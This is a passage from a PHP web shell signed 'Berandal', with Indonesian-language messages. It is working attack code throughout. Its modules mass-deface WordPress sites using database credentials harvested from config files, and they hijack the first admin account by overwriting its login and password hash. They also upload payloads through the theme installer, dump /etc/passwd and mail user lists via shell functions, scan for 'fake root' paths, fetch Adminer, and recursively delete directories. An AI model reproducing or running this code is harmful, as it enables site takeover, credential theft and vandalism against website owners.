  3503.             $config = file_get_contents("$conf/$file_conf");
  3504.             if(preg_match("/WordPress/", $config)) {
  3505.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3506.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3507.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3508.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3509.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3510.                 $prefix = $dbprefix."posts";
  3511.                 $option = $dbprefix."options";
  3512.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3513.                 $db = mysql_select_db($dbname);
  3514.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  3515.                 $result = mysql_fetch_array($q);
  3516.                 $id = $result[ID];
  3517.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3518.                 $result2 = mysql_fetch_array($q2);
  3519.                 $target = $result2[option_value];
  3520.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  3521.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  3522.                 echo "<div style='margin: 5px auto;'>";
  3523.                 if($target == '') {
  3524.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya cok !!</font> -> ";
  3525.                 } else {
  3526.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  3527.                 }
  3528.                 if(!$update OR !$conn OR !$db) {
  3529.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  3530.                 } else {
  3531.                     echo "<font color=lime>Sukses ganti, CoK!</font><br>";
  3532.                 }
  3533.                 echo "</div>";
  3534.                 mysql_close($conn);
  3535.             }
  3536.         }
  3537.     } else {
  3538.         echo "<div style='text-align:left' class='mybox'>
  3539.         <h1>Auto Edit Title+Content WordPress</h1><hr color='white'>
  3540.         <form method='post'>
  3541.         DIR Config:
  3542.         <input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' size='50' name='config_dir' value='$dir'><br><br>
  3543.         Set Title:
  3544.         &nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='new_title' value='Touched by Berandal' size='40' placeholder='New Title'><br><br>
  3545.         Edit Content?: <input type='radio' style='border-color=white'name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  3546.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  3547.         <textarea style='border-color:#292929' name='edit_content' class='mybox' placeholder='contoh script: http://pastebin.com/u/Berandal666' style='width: 450px; height: 150px;'></textarea><br>
  3548.         <input type='submit' name='SIKAT!' style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' class='kotak' value='SIKAT!' style='width: 450px;'><br>
  3549.         </form>
  3550.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/os_config )</span></div><br>
  3551.         ";
  3552.     }
  3553. }
  3554. elseif($_GET['666'] == 'fake_root') {
  3555.     ob_start();
  3556.     function reverse($url) {
  3557.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  3558.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3559.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  3560.               curl_setopt($ch, CURLOPT_HEADER, 0);
  3561.               curl_setopt($ch, CURLOPT_POST, 1);
  3562.         $resp = curl_exec($ch);
  3563.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3564.         $array = explode(",,", $resp);
  3565.         unset($array[0]);
  3566.         foreach($array as $lnk) {
  3567.             $lnk = "http://$lnk";
  3568.             $lnk = str_replace(",", "", $lnk);
  3569.             echo $lnk."\n";
  3570.             ob_flush();
  3571.             flush();
  3572.         }
  3573.               curl_close($ch);
  3574.     }
  3575.     function cek($url) {
  3576.         $ch = curl_init($url);
  3577.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3578.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  3579.         $resp = curl_exec($ch);
  3580.         return $resp;
  3581.     }
  3582.     $cwd = getcwd();
  3583.     $ambil_user = explode("/", $cwd);
  3584.     $user = $ambil_user[2];
  3585.     if($_POST['reverse']) {
  3586.         $site = explode("\r\n", $_POST['url']);
  3587.         $file = $_POST['file'];
  3588.         foreach($site as $url) {
  3589.             $cek = cek("$url/~$user/$file");
  3590.             if(preg_match("/hacked/i", $cek)) {
  3591.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=white>Fake Root!</font><br>";
  3592.             }
  3593.         }
  3594.     } else {
  3595.         echo "<div style='text-align:left' class='mybox'><form method='post'>
  3596.         <h1>Fake Root Scanner</h1><hr color='white'>
  3597.         Filename: <input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' style='border-color=white' name='file' placeholder='os.html' size='50' height='10'><br><br>
  3598.         User: &nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' value='$user' size='50' style='border-color=white' height='10' readonly><br><br>
  3599.         Domen:<br>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp
  3600.         <textarea style='border-color:#292929; class='mybox' height: 250px;' name='url'>";
  3601.         reverse($_SERVER['HTTP_HOST']);
  3602.         echo "</textarea><br>
  3603.         &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type='submit' style='width: 130px; height: 30px; border-color=white;margin:10px 2px 0 2px;' name='reverse' value='Scan Fake Root!' class='kotak' style='width: 450px; border-color=white;'>
  3604.         </form><br>
  3605.         &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbspNB: Sebelum pake Tools ini , upload dulu script depes di dir /home/user/ dan /home/user/public_html.</div>";
  3606.     }
  3607. } elseif($_GET['666'] == 'adminer') {
  3608.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3609.     function adminer($url, $isi) {
  3610.         $fp = fopen($isi, "w");
  3611.         $ch = curl_init();
  3612.               curl_setopt($ch, CURLOPT_URL, $url);
  3613.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3614.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3615.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3616.               curl_setopt($ch, CURLOPT_FILE, $fp);
  3617.         return curl_exec($ch);
  3618.               curl_close($ch);
  3619.         fclose($fp);
  3620.         ob_flush();
  3621.         flush();
  3622.     }
  3623.     if(file_exists('adminer.php')) {
  3624.         echo "<center class='mybox'><font color=white><a href='$full/adminer.php' target='_blank'>-=[ ADMINER LOGIN ]=-</a></font></center>";
  3625.     } else {
  3626.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3627.             echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> ADMINER LOGIN <-</a></font></center>";
  3628.         } else {
  3629.             echo "<center><font color=red>Gagal buat file adminer, Jancok!</font></center>";
  3630.         }
  3631.     }
  3632. }elseif($_GET['666'] == 'passwbypass') {
  3633.     echo '<div class="mybox"><br><center>Bypass etc/passw With:<br>
  3634. <table style="width:50%">
  3635.   <tr>
  3636.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="System Function" name="syst"></form></td>
  3637.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="Passthru Function" name="passth"></form></td>
  3638.     <td><form method="post"><input style="border-color=white;" type="submit" class="kotak" value="Exec Function" name="ex"></form></td>  
  3639.     <td><form method="post"><input style="border-color=white;" type="submit" class="kotak" value="Shell_exec Function" name="shex"></form></td>      
  3640.     <td><form method="post"><input style="border-color=white;" type="submit" class="kotak" value="Posix_getpwuid Function" name="berandal"></form></td>
  3641. </tr></table>Bypass User With : <table style="width:50%">
  3642. <tr>
  3643.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="Awk Program" name="awkuser"></form></td>
  3644.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="System Function" name="systuser"></form></td>
  3645.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="Passthru Function" name="passthuser"></form></td>  
  3646.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="Exec Function" name="exuser"></form></td>      
  3647.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3648. </tr>
  3649. </table><br></div>';
  3650.  
  3651.  
  3652. if ($_POST['awkuser']) {
  3653. echo"<textarea class='inputzbut' style='border-color=white;' cols='65' rows='15'>";
  3654. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3655. echo "</textarea><br>";
  3656. }
  3657. if ($_POST['systuser']) {
  3658. echo"<textarea class='inputzbut' style='border-color=white;' cols='65' rows='15'>";
  3659. echo system("ls /var/mail");
  3660. echo "</textarea><br>";
  3661. }
  3662. if ($_POST['passthuser']) {
  3663. echo"<textarea class='inputzbut' style='border-color=white;' cols='65' rows='15'>";
  3664. echo passthru("ls /var/mail");
  3665. echo "</textarea><br>";
  3666. }
  3667. if ($_POST['exuser']) {
  3668. echo"<textarea class='inputzbut' style='border-color=white;' cols='65' rows='15'>";
  3669. echo exec("ls /var/mail");
  3670. echo "</textarea><br>";
  3671. }
  3672. if ($_POST['shexuser']) {
  3673. echo"<textarea class='inputzbut' style='border-color=white;' cols='65' rows='15'>";
  3674. echo shell_exec("ls /var/mail");
  3675. echo "</textarea><br>";
  3676. }
  3677. if($_POST['syst'])
  3678. {
  3679. echo"<textarea class='inputz' style='border-color=white;' cols='65' rows='15'>";
  3680. echo system("cat /etc/passwd");
  3681. echo"</textarea><br><br><b></b><br>";
  3682. }
  3683. if($_POST['passth'])
  3684. {
  3685. echo"<textarea class='inputz' style='border-color=white;' cols='65' rows='15'>";
  3686. echo passthru("cat /etc/passwd");
  3687. echo"</textarea><br><br><b></b><br>";
  3688. }
  3689. if($_POST['ex'])
  3690. {
  3691. echo"<textarea class='inputz' style='border-color=white;' cols='65' rows='15'>";
  3692. echo exec("cat /etc/passwd");
  3693. echo"</textarea><br><br><b></b><br>";
  3694. }
  3695. if($_POST['shex'])
  3696. {
  3697. echo"<textarea class='inputz' style='border-color=white;' cols='65' rows='15'>";
  3698. echo shell_exec("cat /etc/passwd");
  3699. echo"</textarea><br><br><b></b><br>";
  3700. }
  3701. echo '<center>';
  3702. if($_POST['berandal'])
  3703. {
  3704. echo"<textarea class='inputz' style='border-color=white;' cols='65' rows='15'>";
  3705. for($uid=0;$uid<60000;$uid++){
  3706. $ara = posix_getpwuid($uid);
  3707. if (!empty($ara)) {
  3708. while (list ($key, $val) = each($ara)){
  3709. print "$val:";
  3710. }
  3711. print "\n";
  3712. }
  3713. }
  3714. echo"</textarea><br><br>";
  3715. }
  3716. //
  3717.  
  3718. //
  3719. } elseif($_GET['666'] == 'auto_dwp') {
  3720.     if($_POST['auto_deface_wp']) {
  3721.         function anucurl($sites) {
  3722.             $ch = curl_init($sites);
  3723.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3724.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3725.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3726.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3727.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3728.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3729.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3730.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3731.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3732.             $data = curl_exec($ch);
  3733.                   curl_close($ch);
  3734.             return $data;
  3735.         }
  3736.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3737.             $post = array(
  3738.                    "log" => "$userr",
  3739.                    "pwd" => "$pass",
  3740.                    "rememberme" => "forever",
  3741.                    "wp-submit" => "$wp_submit",
  3742.                    "redirect_to" => "$web",
  3743.                    "testcookie" => "1",
  3744.                    );
  3745.             $ch = curl_init($cek);
  3746.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3747.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3748.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3749.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3750.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3751.                   curl_setopt($ch, CURLOPT_POST, 1);
  3752.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3753.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3754.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3755.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3756.             $data = curl_exec($ch);
  3757.                   curl_close($ch);
  3758.             return $data;
  3759.         }
  3760.         $scan = $_POST['link_config'];
  3761.         $link_config = scandir($scan);
  3762.         $script = htmlspecialchars($_POST['script']);
  3763.         $user = "Berandal";
  3764.         $pass = "Berandal";
  3765.         $passx = md5($pass);
  3766.         foreach($link_config as $dir_config) {
  3767.             if(!is_file("$scan/$dir_config")) continue;
  3768.             $config = file_get_contents("$scan/$dir_config");
  3769.             if(preg_match("/WordPress/", $config)) {
  3770.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3771.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3772.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3773.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3774.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3775.                 $prefix = $dbprefix."users";
  3776.                 $option = $dbprefix."options";
  3777.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3778.                 $db = mysql_select_db($dbname);
  3779.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3780.                 $result = mysql_fetch_array($q);
  3781.                 $id = $result[ID];
  3782.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3783.                 $result2 = mysql_fetch_array($q2);
  3784.                 $target = $result2[option_value];
  3785.                 if($target == '') {                
  3786.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya cok !!</font><br>";
  3787.                 } else {
  3788.                     echo "[+] $target <br>";
  3789.                 }
  3790.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3791.                 if(!$conn OR !$db OR !$update) {
  3792.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3793.                     mysql_close($conn);
  3794.                 } else {
  3795.                     $site = "$target/wp-login.php";
  3796.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  3797.                     $b1 = anucurl($site2);
  3798.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3799.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3800.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3801.                     $upload3 = base64_decode("YmVyYW5kYWxfdGFtdmFuIDpQ");
  3802.                     $www = "m.php";
  3803.                     $fp5 = fopen($www,"w");
  3804.                     fputs($fp5,$upload3);
  3805.                     $post2 = array(
  3806.                             "_wpnonce" => "$anu2",
  3807.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3808.                             "themezip" => "@$www",
  3809.                             "install-theme-submit" => "Install Now",
  3810.                             );
  3811.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3812.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3813.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3814.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3815.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3816.                           curl_setopt($ch, CURLOPT_POST, 1);
  3817.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3818.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3819.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3820.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3821.                     $data3 = curl_exec($ch);
  3822.                           curl_close($ch);
  3823.                     $y = date("Y");
  3824.                     $m = date("m");
  3825.                     $namafile = "id.php";
  3826.                     $fpi = fopen($namafile,"w");
  3827.                     fputs($fpi,$script);
  3828.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3829.                            curl_setopt($ch6, CURLOPT_POST, true);
  3830.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3831.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3832.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3833.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3834.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  3835.                     $postResult = curl_exec($ch6);
  3836.                            curl_close($ch6);
  3837.                     $as = "$target/k.php";
  3838.                     $bs = anucurl($as);
  3839.                     if(preg_match("#$script#is", $bs)) {
  3840.                         echo "[+] <font color='white'>Sukse Mass, Jancok!</font><br>";
  3841.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3842.                         } else {
  3843.                         echo "[-] <font color='red'>Gagal Mass, Asu!</font><br>";
  3844.                         echo "[!!] coba aja manual: <br>";
  3845.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3846.                         echo "[+] username: <font color=white>$user</font><br>";
  3847.                         echo "[+] password: <font color=white>$pass</font><br><br>";    
  3848.                         }
  3849.                     mysql_close($conn);
  3850.                 }
  3851.             }
  3852.         }
  3853.     } else {
  3854.         echo "<center class='mybox'><h1>WordPress Auto Deface</h1><hr color='white'><br>
  3855.         <form method='post'>
  3856.         <input type='text' style='border-color=white;' name='link_config' size='50' height='10' value='$dir'><br><br>
  3857.         <input type='text' style='border-color=white;' name='script' height='10' size='50' placeholder='Touched by Berandal' required><br><br>
  3858.         <input type='submit' style='width: 60px; text-align:center; border-color=white' name='auto_deface_wp' class='kotak' value='SIKAT!'><br>
  3859.         </form>
  3860.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/os_config )</span>
  3861.         </center>";
  3862.     }
  3863. } elseif($_GET['666'] == 'auto_dwp2') {
  3864.     if($_POST['auto_deface_wp']) {
  3865.         function anucurl($sites) {
  3866.             $ch = curl_init($sites);
  3867.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3868.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3869.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3870.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3871.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3872.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3873.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3874.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3875.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  3876.             $data = curl_exec($ch);
  3877.                   curl_close($ch);
  3878.             return $data;
  3879.         }
  3880.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3881.             $post = array(
  3882.                    "log" => "$userr",
  3883.                    "pwd" => "$pass",
  3884.                    "rememberme" => "forever",
  3885.                    "wp-submit" => "$wp_submit",
  3886.                    "redirect_to" => "$web",
  3887.                    "testcookie" => "1",
  3888.                    );
  3889.             $ch = curl_init($cek);
  3890.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3891.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3892.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3893.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3894.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3895.                   curl_setopt($ch, CURLOPT_POST, 1);
  3896.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3897.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3898.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3899.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3900.             $data = curl_exec($ch);
  3901.                   curl_close($ch);
  3902.             return $data;
  3903.         }
  3904.         $link = explode("\r\n", $_POST['link']);
  3905.         $script = htmlspecialchars($_POST['script']);
  3906.         $user = "berandal";
  3907.         $pass = "berandal";
  3908.         $passx = md5($pass);
  3909.         foreach($link as $dir_config) {
  3910.             $config = anucurl($dir_config);
  3911.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  3912.             $dbuser = ambilkata($config,"DB_USER', '","'");
  3913.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3914.             $dbname = ambilkata($config,"DB_NAME', '","'");
  3915.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3916.             $prefix = $dbprefix."users";
  3917.             $option = $dbprefix."options";
  3918.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3919.             $db = mysql_select_db($dbname);
  3920.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3921.             $result = mysql_fetch_array($q);
  3922.             $id = $result[ID];
  3923.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3924.             $result2 = mysql_fetch_array($q2);
  3925.             $target = $result2[option_value];
  3926.             if($target == '') {                
  3927.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya cok !!</font><br>";
  3928.             } else {
  3929.                 echo "[+] $target <br>";
  3930.             }
  3931.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3932.             if(!$conn OR !$db OR !$update) {
  3933.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3934.                 mysql_close($conn);
  3935.             } else {
  3936.                 $site = "$target/wp-login.php";
  3937.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  3938.                 $b1 = anucurl($site2);
  3939.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3940.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3941.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3942.                 $upload3 = base64_decode("YmVyYW5kYWxfdGFtdmFuIDpQ");
  3943.                 $www = "m.php";
  3944.                 $fp5 = fopen($www,"w");
  3945.                 fputs($fp5,$upload3);
  3946.                 $post2 = array(
  3947.                         "_wpnonce" => "$anu2",
  3948.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3949.                         "themezip" => "@$www",
  3950.                         "install-theme-submit" => "Install Now",
  3951.                         );
  3952.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3953.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3954.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3955.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3956.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3957.                       curl_setopt($ch, CURLOPT_POST, 1);
  3958.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3959.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3960.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3961.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3962.                 $data3 = curl_exec($ch);
  3963.                       curl_close($ch);
  3964.                 $y = date("Y");
  3965.                 $m = date("m");
  3966.                 $namafile = "os.php";
  3967.                 $fpi = fopen($namafile,"w");
  3968.                 fputs($fpi,$script);
  3969.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3970.                        curl_setopt($ch6, CURLOPT_POST, true);
  3971.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3972.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3973.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3974.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3975.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  3976.                 $postResult = curl_exec($ch6);
  3977.                        curl_close($ch6);
  3978.                 $as = "$target/as.php";
  3979.                 $bs = anucurl($as);
  3980.                 if(preg_match("#$script#is", $bs)) {
  3981.                     echo "[+] <font color='lime'>Sukses mepes, COK!</font><br>";
  3982.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3983.                     } else {
  3984.                     echo "[-] <font color='red'>gagal mepes cok!!</font><br>";
  3985.                     echo "[!!] coba aja manual: <br>";
  3986.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3987.                     echo "[+] username: <font color=white>$user</font><br>";
  3988.                     echo "[+] password: <font color=white>$pass</font><br><br>";    
  3989.                     }
  3990.                 mysql_close($conn);
  3991.             }
  3992.         }
  3993.     } else {
  3994.         echo "<center class='mybox'><h1>WordPress Auto Deface V.2</h1><hr color='white'><br>
  3995.         <form method='post'>
  3996.         Link Config: <br>
  3997.         <textarea name='link' style='border-color=white;' placeholder='http://target.com/os_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br><br>
  3998.         <input type='text' style='border-color=white;' name='script' height='10' size='60' placeholder='Touched by Berandal' required><br><br>
  3999.         <input type='submit' style='width: 450px; border-color=white' name='auto_deface_wp' class='kotak' value='SIKAT!'>
  4000.         </form></center>";
  4001.     }
  4002. }
  4003. elseif($_GET['act'] == 'newfile') {
  4004.     if($_POST['new_save_file']) {
  4005.         $newfile = htmlspecialchars($_POST['newfile']);
  4006.         $fopen = fopen($newfile, "a+");
  4007.         if($fopen) {
  4008.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  4009.         } else {
  4010.             $act = "<font color=red>Gak dibolehin, Jancok!</font>";
  4011.         }
  4012.     }
  4013.     echo $act;
  4014.     echo "<form method='post'><h1>New File</h1>
  4015.     Filename: <input type='text' name='newfile' value='$dir/asu.php' style='width: 450px; border-color=white' height='10'>
  4016.     <input type='submit' name='new_save_file' style='border-color=white' class='kotak' value='SIKAT!'>
  4017.     </form>";
  4018. } elseif($_GET['act'] == 'newfolder') {
  4019.     if($_POST['new_save_folder']) {
  4020.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  4021.         if(!mkdir($new_folder)) {
  4022.             $act = "<font color=red>Gak dibolehin, Jancok!</font>";
  4023.         } else {
  4024.             $act = "<script>window.location='?dir=".$dir."';</script>";
  4025.         }
  4026.     }
  4027.     echo $act;
  4028.     echo "<form method='post'><h1>New Dir</h1>
  4029.     Folder Name: <input type='text' name='newfolder' style='width: 450px; border-color=white' height='10'>
  4030.     <input type='submit' name='new_save_folder' style='border-color=white' class='kotak' value='SIKAT!'>
  4031.     </form>";
  4032. } elseif($_GET['act'] == 'rename_dir') {
  4033.     if($_POST['dir_rename']) {
  4034.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  4035.         if($dir_rename) {
  4036.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4037.         } else {
  4038.             $act = "<font color=red>Gak dibolehin, Jancok!</font>";
  4039.         }
  4040.     echo "".$act."<br>";
  4041.     }
  4042.     echo "<form method='post'><h1>Rename Dir</h1>
  4043.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px; border-color=white' height='10'>
  4044.     <input type='submit' class='kotak' style='border-color=white' name='dir_rename' value='rename'>
  4045.     </form>";
  4046. } elseif($_GET['act'] == 'delete_dir') {
  4047.     function Delete($path)
  4048. {
  4049.     if (is_dir($path) === true)
  4050.     {
  4051.         $files = array_diff(scandir($path), array('.', '..'));
  4052.         foreach ($files as $file)
  4053.         {
  4054.             Delete(realpath($path) . '/' . $file);
  4055.         }
  4056.         return rmdir($path);
  4057.     }
  4058.     else if (is_file($path) === true)
  4059.     {
  4060.         return unlink($path);
  4061.     }
  4062.     return false;
  4063. }
  4064.     $delete_dir = Delete($dir);
  4065.     if($delete_dir) {
  4066.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4067.     } else {
  4068.         $act = "<font color=red>Gabisa dihapus nih :( ".basename($dir)."</font>";
  4069.     }
  4070.     echo $act;
